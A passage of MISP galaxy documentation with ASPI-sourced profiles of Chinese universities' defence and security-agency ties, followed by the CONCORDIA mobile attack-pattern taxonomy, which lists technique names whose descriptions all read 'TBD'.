Tianjin Polytechnic University (天津工业大学)

TJPU is known for its research in the field of textile science and engineering. It is jointly supervised by the Ministry of Education and the city of Tianjin. In 2018, defence industry agency SASTIND and the Tianjin Municipal Government signed an agreement to jointly support TJPU. The purpose of the agreement is to support the university’s development of defence disciplines, construction of defence laboratories, and training of defence scientists. Through this arrangement, SASTIND involves universities in military research projects and supports collaboration between universities and the defence industry. The university also holds secret-level security credentials that allow it to participate in classified defence technology projects.Tianjin Polytechnic University hosts one state key lab and two MOE key labs. One of the MOE key labs and the state key lab are located within the School of Material Science and Engineering. Additionally, TJPU’s School of Textile Science and Engineering has conducted R&D that has been applied to industries in aerospace, defense, transportation, civil engineering, among others. The School of Textile Science and Engineering has reportedly become a backbone of research and innovation for China’s textile industry.

The tag is: misp-galaxy:china-defence-universities="Tianjin Polytechnic University (天津工业大学)"

Table 962. Table References

Links

https://unitracker.aspi.org.au/universities/tianjin-polytechnic-university

Tianjin University (天津大学)

TJU is under the administration of the Ministry of Education and has also been supervised by defence industry agency SASTIND since 2012. The university has second-class security credentials, allowing it to participate in classified research projects at the level of ‘secret’. It hosts two defence laboratories, working on optoelectronics and propellants.In 2015, A professor at Tianjin University was arrested by U.S. federal agents and accused of economic espionage and technology theft. He had been a professor in the School of Precision Instrument and Opto-electronics Engineering, which is home to one of the MOE labs involved in defense research. TJU is also a member of several international engineering alliances and has one National Defense Technology Innovation Team.TJU carries out research for the Ministry of State Security (MSS), China’s civilian intelligence agency. It has hosted at least one MSS researcher and its scientists have been awarded for their work for the MSS on communication and information engineering.

The tag is: misp-galaxy:china-defence-universities="Tianjin University (天津大学)"

Table 963. Table References

Links

https://unitracker.aspi.org.au/universities/tianjin-university

Tongji University (同济大学)

Tongji University recognized for its work in architecture, civil engineering, marine geology, and transportation engineering. The university established the only state key laboratory of deep-sea geology, which plays an important role in China’s deep-sea observation and serves as a significant platform for the country’s marine strategy.The university’s involvement in marine research likely stems from its joint construction with the State Oceanic Administration (SOA). In 2010, the Ministry of Education and the State Oceanic Administration signed to jointly establish 17 universities, a collaboration aimed at enhancing the ability to cultivate marine talents in universities, develop marine science and technology, and make contributions to the development of China’s marine industry.Tongji University has secret-level security credentials and is home to one Ministry of Education laboratory dedicated to defense research. In April 2019, the university was placed on the U.S. Unverified List, which places restrictions on US exports to the university. Entities are added the Unverified List if the US Government is unable to satisfactorily carry out end-user checks on them to ensure compliance with export licenses.

The tag is: misp-galaxy:china-defence-universities="Tongji University (同济大学)"

Table 964. Table References

Links

https://unitracker.aspi.org.au/universities/tongji-university

Tsinghua University (清华大学)

Tsinghua University is considered China’s leading university in science and technology. Often characterized as ‘China’s MIT,’ Tsinghua is highly ranked globally, while also being the alma mater of numerous Chinese leaders, including Xi Jinping. Tsinghua has been included in numerous Chinese educational initiatives, including acting as a Class A institution in the Double First-Class University Plan and with membership in China’s C9 League. As of spring 2018, Tsinghua University had 390 research institutions operating across a range of fields.Tsinghua engages in a range of military research and was awarded secret-level security credentials for classified research in 2007. In advancing military-civil fusion, Tsinghua also continues its ‘fine tradition’ of serving China’s national security and defense, actively creating new platforms and initiatives to support this strategy. Not only its dedicated defence laboratories but also a range of key laboratories and research institutions at the university have received funding from the military. Since at least 2012, Tsinghua has also been jointly supervised by defence industry agency SASTIND as part of a program to deepen its defence research and links to the defence sector.Tsinghua’s defence research covers areas such as artificial intelligence, air-to-air missiles, navigation technology, instrument science and materials science.The university trains students for China’s nuclear weapons program, military and defence industry. In 2014 it signed a strategic cooperation agreement with the Chinese Academy of Engineering Physics (CAEP)—China’s nuclear weapons program.  In 2016, CAEP’s Materials Institute and Tsinghua established a joint postgraduate training base for teaching, research collaboration and equipment sharing.Approximately 200 postgraduate students at Tsinghua are sponsored by CAEP or defence industry conglomerates each year through the Chinese government’s National Defence Science and Technology Scholarship program. Scholarship recipients are required to work for their sponsoring organisation for five years after graduating. Roughly 2000 of the scholarships are awarded each year, indicating that Tsinghua students are among the primary recipients of them. Documents published by Tsinghua indicate that CAEP planned to sponsor 40 PhD students to study nuclear technology in 2013. CAEP continues to sponsor Tsinghua postgraduates. In 2004, Tsinghua agreed to supervise doctoral students from the PLA’s Second Artillery Engineering University, now known as the Rocket Force University of Engineering.

The tag is: misp-galaxy:china-defence-universities="Tsinghua University (清华大学)"

Table 965. Table References

Links

https://unitracker.aspi.org.au/universities/tsinghua-university

University of Electronic Science and Technology of China (电子科技大学)

UESTC was established in 1961 as one of China’s first defence industry universities. It is now subordinate to the Ministry of Education (MOE) and is also jointly supervised by defence industry agencies MIIT and SASTIND, as well as the Chinese military’s leading electronics manufacturer, China Electronics Technology Group Corporation (CETC).The university is one of China’s leading universities for defence electronics research. It claims to rank among the top MOE universities in terms of the scale of its defence research. Between 2011 and 2015, its annual spending on defence research grew by 210% to RMB400 million (AUD80 million) and may account for as much as 32% of its overall research spending. 16.43% of UESTC graduates in 2017 who found employment were working in the defence sector. UESTC gained secret-level security credentials about a decade ago, probably in 2006, making it one of the first MOE universities to hold them.UESTC research has been used by state-owned manufacturers of military aircraft, missiles, and military electronics and the PLA Navy on projects such as the JF-17 fighter and the Navy’s aircraft carrier program.UESTC’s defence research covers areas including electronics, microwaves, terahertz technology, anti-jamming technology and signal processing, communication systems, military-use critical materials, optoelectric imaging. Between 2001 and 2005, UESTC undertook over 900 military electronics projects worth in excess of RMB500 million (AUD104 million).UESTC’s research on artificial intelligence has attracted scrutiny for its human rights implications. In 2015, a professor recruited by UESTC through the Thousand Talents Plan established a company called Koala AI. The company produces artificial intelligence surveillance systems that are used in Xinjiang, where an estimated 1.5 million Uyghurs and other ethnic minorities have disappeared into concentration camps.UESTC has close relationships with the Chinese defence industry. The university operates a national laboratory on high-power radiation with the Chinese Academy of Engineering Physics, the PRC’s primary nuclear warhead research complex. CETC, a state-owned defence conglomerate, partnered jointly with the MOE to developUESTC’s capabilities. Under the arrangement, UESTC agreed to expand its collaboration with CETC, help train CETC personnel and send its best students to work at CETC. Defence industry agency SASTIND also signed agreements to supervise UESTC in 2008 and 2016.

The tag is: misp-galaxy:china-defence-universities="University of Electronic Science and Technology of China (电子科技大学)"

Table 966. Table References

Links

https://unitracker.aspi.org.au/universities/university-of-electronic-science-and-technology-of-china

University of International Relations (国际关系学院)

UIR claims was established in 1949 under the direction of then Premier Zhou Enlai. In 1964 it was designated as a ‘national key university’, and this appears to be the evidence it uses to claim it is a Ministry of Education university. However, the university does not appear on the Ministry of Education’s list of subordinate universities.Individuals formerly and presently affiliated with the university have also held affiliations with the MSS or the MSS-linked think tank the China Institutes of Contemporary International Relations (中国现代国际关系研究院). They include Geng Huichang (耿惠昌), a former Minister of State Security (2007-2016) and vice minister of State Security (1998-2007). Prior to this he was the head of  China Institutes of Contemporary International Relations from 1992 to 1998. From 1990 to 1992, he was the director of UIR’s American Research Department and from 1985-1990 he was deputy director of the American Research department.  Notably, current UIR President Tao Jian is also a former CICIR vice-president and a UIR graduate.UIR gives the MSS a way to work with foreign universities and academics to shape and learn about perceptions of the PRC’s views on security. It also provides a platform for the MSS to identify talent, recruit officers and collect intelligence.The university’s Hangzhou campus, also known as the Zhejiang Second People’s Police School, may carry out more practical training of MSS officers and has been described on a local government website as ‘specialising in training special talent’. Some graduates of the Hangzhou campus have moved straight into MSS positions. The Hangzhou campus works closely with Zhejiang University on teaching and research.

The tag is: misp-galaxy:china-defence-universities="University of International Relations (国际关系学院)"

Table 967. Table References

Links

https://unitracker.aspi.org.au/universities/university-of-international-relations

University of Science and Technology Beijing (北京科技大学)

USTC is a leading university subordinate to the MOE. The university engages in high levels of defence research and claims be among the top MOE universities for defence spending. Since 2018, it has been under a joint-construction agreement between the MOE and defence industry agency SASTIND that is designed to expand its involvement in defence research.USTB is known as the ‘cradle of steel’ for its training and research on metallurgy. The university’s defence research appears to focus on metallurgy and materials science. It hosts at least three laboratories dedicated to defence research, including two that are jointly run with state-owned defence conglomerates. The head of USTB’s Institute of Advanced Materials and Technology also heads a SASTIND-supported defence science and technology innovation team.The university holds secret-level security credentials, allowing it participate in research and production for classified weapons and defence technology projects.

The tag is: misp-galaxy:china-defence-universities="University of Science and Technology Beijing (北京科技大学)"

Table 968. Table References

Links

https://unitracker.aspi.org.au/universities/university-of-science-and-technology-beijing

University of Science and Technology of China (中国科学技术大学)

The University of Science and Technology of China is among China’s most prestigious universities in science and technology. Uniquely, it was established and is supervised by the Chinese Academy of Sciences, intended to serve national objectives in science and technology. Xi Jinping personally inspected USTC in 2016, urging it to pursue “even more outstanding achievements in teaching and innovation.” It is a member of the C9 League and in the “211 Project” and “985 Project.” While providing undergraduate and graduate-level education, USTC is also highly active in research across a number of major laboratories, including several that support research that is related to national defense and the development of dual-use technologies, such as brain-inspired approaches to artificial intelligence and quantum information science. USTC has a long history of contributions to science in the service of the state, and it has recently sought to deepen its contributions to military research, including through establishing a new center for military-civil fusion. Several USTC professors, including prominently Pan Jianwei, have partnered with the defense industry to pursue military applications of their technologies.

The tag is: misp-galaxy:china-defence-universities="University of Science and Technology of China (中国科学技术大学)"

Table 969. Table References

Links

https://unitracker.aspi.org.au/universities/university-of-science-and-technology-of-china

University of Shanghai for Science and Technology (上海理工大学)

USST describes itself as a ‘university with defence characteristics’. It has been under the joint supervision of Shanghai and defence industry agency SASTIND since 2016.It is engaged in growing levels of defence research and holds second-class weapons research and development secrecy credentials, allowing it to undertake classified projects. In 2017, its spending on defence research reached RMB13 million (AUD2.6 million).SASTIND has designated areas with the fields of optics, energy and control science as defence disciplines at USST, indicating that the university’s defence research focuses on these areas.In 2017, The university established a joint venture on terahertz radiation technology with subsidiaries of defence conglomerate Norinco Group.

The tag is: misp-galaxy:china-defence-universities="University of Shanghai for Science and Technology (上海理工大学)"

Table 970. Table References

Links

https://unitracker.aspi.org.au/universities/university-of-shanghai-for-science-and-technology

University of South China (南华大学)

USC specialises in nuclear engineering. It has a well-developed defence research program and has been the subject of several joint-construction agreements between the Hunan Provincial Government and defence industry agency SASTIND since 2002. These agreements are designed to ‘support USC in going a step further to display its defence characteristics based on the development needs of the defence technology industry.’ USC is also supervised by China National Nuclear Corporation, a state-owned defence nuclear engineering conglomerate.USC carries out large amounts of defence research related to nuclear engineering, as well as work on information technology, communications engineering, control engineering and electrical engineering. The university received secret level security credentials in 2008, allowing it to work on classified defence projects.

The tag is: misp-galaxy:china-defence-universities="University of South China (南华大学)"

Table 971. Table References

Links

https://unitracker.aspi.org.au/universities/university-of-south-china

Wuhan University (武汉大学)

WHU is a leading Chinese university subordinate to the Ministry of Education. The university has close ties to the military and has been subject to a joint-supervision agreement between the Ministry of Education and defence industry agency SASTIND since 2016, an arrangement designed to increase its involvement in defence research. In 2015, WHU planned to spend RMB200 million (AUD42 million) on defence research for the year and described itself as ‘a university with a strong reputation in the defence science and technology field’.WHU carries out defence research in a wide range of fields, including navigation, computer simulation, electronic information, electromagnetics, aerospace remote sensing, materials science, cyber security and explosions. The university is an important site of research for China’s Beidou satellite navigation system.Aside from being involved in defence research, there are strong indications that WHU has carried out cyber attacks for the People’s Liberation Army. One of the university’s two defence laboratories purportedly established by the Ministry of Education, the Key Laboratory of Aerospace Information Security and Trusted Computing, has been accused by unnamed US and Taiwanese officials of carrying out cyberattacks.

The tag is: misp-galaxy:china-defence-universities="Wuhan University (武汉大学)"

Table 972. Table References

Links

https://unitracker.aspi.org.au/universities/wuhan-university

Wuhan University of Technology (武汉理工大学)

WHUT is subordinate to the Ministry of Education. The university originally specialised in research relating to construction, transport and automobiles. It engages in high levels of defence research and has been under a ‘joint-construction’ agreement between the Ministry of Education and defence industry agency SASTIND since 2016. It holds secret-level security credentials.The university hosts two Ministry of Education laboratories dedicated to defence research on materials science and ship technology. WHUT also works closely with the PLA Air Force on defensive engineering such as the construction of aircraft bunkers and underground shelters. Since 2001, WHUT and the Guangdong Military Region Air Force Engineering and Construction Bureau have run a joint research institute, which ‘takes advantage of [WHUT’s] State Key Laboratory of Advanced Technology for Materials Synthesis and Processing’. ‘In 2012, the PLA Air Force Logistics Department and WHUT held a signing ceremony inaugurating the “Air Force-level Military-Civil Fusion Air Defence Engineering Construction Technology Innovation Platform Cooperation Agreement” (空军级军民融合式空防工程建设科技创新平台合作协议)’. The same department in cooperation with WHUT also jointly established the Air Force Air Defence Engineering Construction Technology Innovation Platform (空军级空防工程建设科技创新平台), with ‘the goal of innovating mutually beneficial technologies.’

The tag is: misp-galaxy:china-defence-universities="Wuhan University of Technology (武汉理工大学)"

Table 973. Table References

Links

https://unitracker.aspi.org.au/universities/wuhan-university-of-technology

Xi’an Jiaotong University (西安交通大学)

XJTU is subordinate to the Ministry of Education. It is also supervised by SASTIND as part of a program to develop defense research capabilities within Chinese universities. The university describes its strategy as being ‘based in Shaanxi, geared toward the needs of the nation, and serving the national defense industry.’The university is advanced in its implementation of military-civil fusion and has established strategic partnerships with China Aerospace Science and Technology Corporation, China Aerospace Science and Industry Corporation, and the Aero Engine Corporation of China. It holds secret-level security credentials, allowing it to participate in classified defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Xi’an Jiaotong University (西安交通大学)"

Table 974. Table References

Links

https://unitracker.aspi.org.au/universities/xian-jiaotong-university

Xi’an Technological University (西安工业大学)

XATU is a civilian university that primarily engages in defence research. XATU describes itself as ‘having distinct defence-industrial characteristics’ and is heavily involved in weapons development. Since 2016, it has been subject to a ‘joint construction’ agreement between the Shaanxi Provincial Government and defence industry agency SASTIND designed to deepen its defence links.The university’s main areas of defence research include photoelectric imaging technology, manufacturing technology, materials science, detection and measurement technology and weapons systems. It holds secret-level security credentials.XATU is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in weapons science—the ‘B’ in ‘B8’ stands for Chinese work for armaments, bingqi (兵器). Apart from Shenyang Ligong University, XATU is the only Chinese civilian university known to be supervised by state-owned arms manufacturers China North Industries Group (Norinco Group) and China South Industries Group.

The tag is: misp-galaxy:china-defence-universities="Xi’an Technological University (西安工业大学)"

Table 975. Table References

Links

https://unitracker.aspi.org.au/universities/xian-technological-university

Xi’an University of Posts and Telecommunications (西安邮电大学)

XUPT is a leading Chinese university supervised by the Shaanxi Provincial Government and the Department of Information Technology. The university was established in 1959 as an institution focused on communications and information technology. XUPT retains a focus on these discipline to this day. XUPT’s faculties include college focusing on artificial intelligence, automation, cyber security and electrical engineering.XUPT maintains close links to China’s Ministry of Public Security (MPS). The university has signed agreements and established joint laboratories with the MPS’s local counterparts.In November 2013, XUPT partnered with the Shaanxi Municipal Government’s public security ministry to establish the MPS Key Laboratory of Electronic Information Application Technology for Scene Investigation (公安部电子信息现场勘验应用技术重点实验室). This was the first such joint laboratory that the MPS established with a university in any of China’s five north-western provinces.XUPT partnered with Xi’an’s Yanta District Public Security Bureau branch in November 2018, establishing the ‘Joint Laboratory for Smart Public Security Information Analysis and Applications’ (公安信息智能分析及应用联合实验室). The joint laboratory develops applications of artificial intelligence for analysing criminal information.

The tag is: misp-galaxy:china-defence-universities="Xi’an University of Posts and Telecommunications (西安邮电大学)"

Table 976. Table References

Links

https://unitracker.aspi.org.au/universities/xian-university-of-posts-and-telecommunications

Xiamen University (厦门大学)

XMU is one of China’s leading universities, but it does not appear to engage in high levels of defence research. However, in 2018 it came under a joint supevision agreement between the Ministry of Education, the Fujian Provincial Government and defence industry agency SASTIND that indicates XMU will expand its involvement in defence research. The arrangement is designed to ‘upgrade the university’s ability to innovate defence science and technology and actively integrate itself with the development of military-civil fusion.’In 2017, XMU allegedly conspired with Huawei to steal trade secrets from CNEX Labs Inc., an American semiconductor startup. CNEX claims that Huawei and XMU engaged in a multiyear conspiracy to steal the company’s solid-state drive computer storage technology.The university appears to be involved in the development of military-use heavy-duty coatings. In 2017, XMU, Fujian Normal University, Fujian Liheng Paint Co. Ltd. (福建立恒涂料有限公司) and People’s Liberation Army Unit 63983 jointly established the Haixi Liheng New Materials Research Institute (海西立恒新材料研究院). Fujian Liheng Paint specialises in heavy-duty coatings for warships and holds confidential-level security credentials, allowing it to participate in classified defence projects.

The tag is: misp-galaxy:china-defence-universities="Xiamen University (厦门大学)"

Table 977. Table References

Links

https://unitracker.aspi.org.au/universities/xiamen-university

Xiangtan University (湘潭大学)

XTU is a university in Chairman Mao Zedong’s hometown that has substantially expanded its participation in defence research in recent years. It has been subject to two ‘joint construction’ agreements between the Hunan Provincial Government and defence industry agency SASTIND that are designed to help the university ‘draw out its national defence characteristics’. In the university’s own words, its ‘military-civil fusion characteristics are becoming clearer with each day’, and it increased its spending on military-related projects by 60% from 2017 to 2018, spending over RMB31 million (AUD6 million) in 2018.XTU’s defence research covers areas including materials science, energy, measurement technology and electromagnetic waves. The university has developed partnerships with a major PLA nuclear technology research institution, Northwest Institute of Nuclear Technology, and several defence companies, including subsidiaries of arms manufacturer Norinco Group and defence aviation conglomerate Aero Engine Corporation of China.XTU holds secret-level security credentials, allowing it to participate in classified defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Xiangtan University (湘潭大学)"

Table 978. Table References

Links

https://unitracker.aspi.org.au/universities/xiangtan-university

Xidian University (西安电子科技大学)

Xidian Univeristy is among China’s top universities for research on antennas, radar, electronic countermeasures and computer science. The university is subordinate to the Ministry of Education and is also jointly supervised by defence industry agency SASTIND and defence electronics conglomerate CETC. It claims it has ‘made important contributions to military modernisation’.The university is closely tied to China’s defense industry and the PLA. It runs at least five defence laboratories and partners with the PLA’s signals intelligence organization. Xidian appears to be an important training ground for Chinese military hackers. According to Xidian’s party secretary, the university has had an ‘unbreakable bond with secret intelligence work since its beginning’. It also holds secret-level security credentials that allow it to work on classified weapons projects.

The tag is: misp-galaxy:china-defence-universities="Xidian University (西安电子科技大学)"

Table 979. Table References

Links

https://unitracker.aspi.org.au/universities/xidian-university

Yanshan University (燕山大学)

The university was formed as an offshoot of Harbin Institute of Technology, one of China’s top defence universities, in 1960. The university continues to prioritise defence research and is jointly supervised by the Hebei Provincial Government together with the Ministry of Education, Ministry of Industry and Information Technology and defence industry agency SASTIND.YSU’s Defense Science and Technology Institute was established in 2006 under the support of COSTIND (a defence industry agency that has been replaced by SASTIND) to expand and oversee defence research at the university. The institute has driven the university’s involvement in space-related defence research through the establishment of laboratories such as the Key Laboratory of Fundamental Science of Mechanical Structure and Materials Science Under Extreme Conditions. Four fields of research at YSU are officially designated as defence disciplines: control theory and control science, electrical circuits and systems, mechanical design and theory, and materials science and engineering.The university holds secret-level security credentials.

The tag is: misp-galaxy:china-defence-universities="Yanshan University (燕山大学)"

Table 980. Table References

Links

https://unitracker.aspi.org.au/universities/yanshan-university

Yunnan Normal University (云南师范大学)

YNNU is a Chinese university subordinate to the Yunnan Provincial Government. Since 2013 it has also been supervised by the Ministry of Education. The university has been focused on training teacher since its inception as the Kunming Teachers College (昆明示范学院) in 1950. YNNU now has a broader focus on a variety of humanities, social and natural science disciplines.YNNU is organised into numerous faculties, some of which are relevant for communist party cadre training:

The tag is: misp-galaxy:china-defence-universities="Yunnan Normal University (云南师范大学)"

Table 981. Table References

Links

https://unitracker.aspi.org.au/universities/yunnan-normal-university

Zhejiang University (浙江大学)

ZJU is subordinate to the Ministry of Education and jointly constructed with defence industry agency SASTIND. This arrangement with SASTIND began in 2016 and is designed to deepend the university’s involvement in defence research. The university holds secret-level security credentials, allowing it to work on classified military projects.The university’s total research funding amounts to RMB4.56 billion (AUD940 million) in 2018. It has at least three defence laboratories, with one source claiming that the university had ten key national laboratories (国家重点实验室) as of 2015. These laboratories are involved in research on computer simulations, high-performance computing and control science. The university also carries out cyber security research and receives funding for this work from the MSS, China’s civilian intelligence agency.ZJU cooperates extensively with international universities and companies, with upwards of 40 international joint S&T research labs. The College of Electrical Engineering has joint labs with U.S. companies in key industries, such as Rockwell Automation in the field of information technology, and the National Semiconductor Corporation. Additionally, the university has a joint research lab with U.S company Microsoft.

The tag is: misp-galaxy:china-defence-universities="Zhejiang University (浙江大学)"

Table 982. Table References

Links

https://unitracker.aspi.org.au/universities/zhejiang-university

CONCORDIA Mobile Modelling Framework - Attack Pattern

A list of Techniques in CONCORDIA Mobile Modelling Framework..

CONCORDIA Mobile Modelling Framework - Attack Pattern is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Bernardo Santos, OsloMet (Norway) - Prof. Dr. Thanh van Do, Telenor Research (Norway) - Luis Barriga, Ericsson AB (Sweden) - Prof. Boning Feng, OsloMet (Norway) - Van Thuan Do, Wolffia AS (Norway) - Bruno Dzogovic, OsloMet (Norway) - Niels Jacot, Wolffia AS (Norway)

Active Scanning

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Active Scanning"

Gather UE Identity Information

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Gather UE Identity Information"

Gather UE Network Information

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Gather UE Network Information"

Phishing for Information

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Phishing for Information"

Social Media Reports

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Social Media Reports"

Develop Capabilities

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Develop Capabilities"

Obtain Capabilities

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Obtain Capabilities"

Stage Capabilities

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Stage Capabilities"

Compromise Accounts

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Compromise Accounts"

Acquire Infrastructure

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Acquire Infrastructure"

Compromise Infrastructure

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Compromise Infrastructure"

Exploit Public-Facing Application

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit Public-Facing Application"

Malicious App from App Store

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Malicious App from App Store"

Malicious App from Third Party

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Malicious App from Third Party"

Masquerade as Legitimate Application

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Masquerade as Legitimate Application"

Exploit via Charging Station or PC

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit via Charging Station or PC"

Exploit via Radio Interfaces

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit via Radio Interfaces"

Rogue Cellular Base Station

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Rogue Cellular Base Station"

Insider attacks and human errors

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Insider attacks and human errors"

Trusted Relationship

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Trusted Relationship"

Supply Chain Compromise

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Supply Chain Compromise"

Native Code

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Native Code"

Scheduled Task/Job

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Scheduled Task/Job"

Command-Line Interface

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Command-Line Interface"

Command and Scripting Interpreter

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Command and Scripting Interpreter"

Boot or Logon Autostart Execution

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Boot or Logon Autostart Execution"

Foreground Persistence

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Foreground Persistence"

Modify Cached Executable Code

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Modify Cached Executable Code"

Compromise Application Executable

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Compromise Application Executable"

Modify OS Kernel or Boot Partition

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Modify OS Kernel or Boot Partition"

Event Triggered Execution

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Event Triggered Execution"

Spoofed radio network

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Spoofed radio network"

Infecting network nodes

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Infecting network nodes"

Code Injection

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Code Injection"

Process Injection

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Process Injection"

Masquerading

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Masquerading"

Disguise Root/Jailbreak Indicators

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Disguise Root/Jailbreak Indicators"

Evade Analysis Environment

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Evade Analysis Environment"

Modify Trusted Execution Environment

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Modify Trusted Execution Environment"

Obfuscated Files or Information

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Obfuscated Files or Information"

Suppress Application Icon

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Suppress Application Icon"

Uninstall Malicious Application

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Uninstall Malicious Application"

Install Insecure or Malicious Configuration

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Install Insecure or Malicious Configuration"

Geofencing

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Geofencing"

Shutdown Remote Device

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Shutdown Remote Device"

Exploitation for Defense Evasion

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploitation for Defense Evasion"

Security Audit Camouflage

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Security Audit Camouflage"

Overload Avoidance

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Overload Avoidance"

Traffic Distribution

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Traffic Distribution"

URI Hijacking

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="URI Hijacking"

Modify Authentication Process

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Modify Authentication Process"

Forced Authentication

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Forced Authentication"

System Network Connections Discovery

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="System Network Connections Discovery"

UE knocking

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="UE knocking"

Internal Resource Search

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Internal Resource Search"

Network Sniffing

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network Sniffing"

Abusing Inter-working Functionalities

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Abusing Inter-working Functionalities"

Replication Through SMS

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Replication Through SMS"

Replication Through Bluetooth

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Replication Through Bluetooth"

Replication Through WLAN

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Replication Through WLAN"

Replication Through IP

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Replication Through IP"

Exploit platform & service specific vulnerabilites

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit platform & service specific vulnerabilites"

Access Sensitive Data in Device Logs

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Access Sensitive Data in Device Logs"

Network Traffic Capture or Redirection

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network Traffic Capture or Redirection"

Network-specific identifiers

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network-specific identifiers"

Network-specific data

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network-specific data"

Application Layer Protocol

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Application Layer Protocol"

Communication via SMS

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Communication via SMS"

Communication via Bluetooth

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Communication via Bluetooth"

Communication via WLAN

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Communication via WLAN"

Exploit SS7 to Redirect Phone Calls/SMS

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit SS7 to Redirect Phone Calls/SMS"

Exploit SS7 to Track Device Location

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit SS7 to Track Device Location"

SS7-based attacks

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="SS7-based attacks"

Diameter-based attacks

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Diameter-based attacks"

GTP-based attacks

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="GTP-based attacks"

NAS-based attacks

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="NAS-based attacks"

MEC-based attacks

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="MEC-based attacks"

Network Slice

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network Slice"

Automated Exfiltration

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Automated Exfiltration"

Data Encrypted

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Data Encrypted"

Alternate Network Mediums

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Alternate Network Mediums"

Data Manipulation

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Data Manipulation"

Endpoint Denial of Service

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Endpoint Denial of Service"

Carrier Billing Fraud

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Carrier Billing Fraud"

SMS Fraud

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="SMS Fraud"

Manipulate Device Communication

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Manipulate Device Communication"

Jamming or Denial of Service

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Jamming or Denial of Service"

Location Tracking

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Location Tracking"

Identity Exploit

TBD

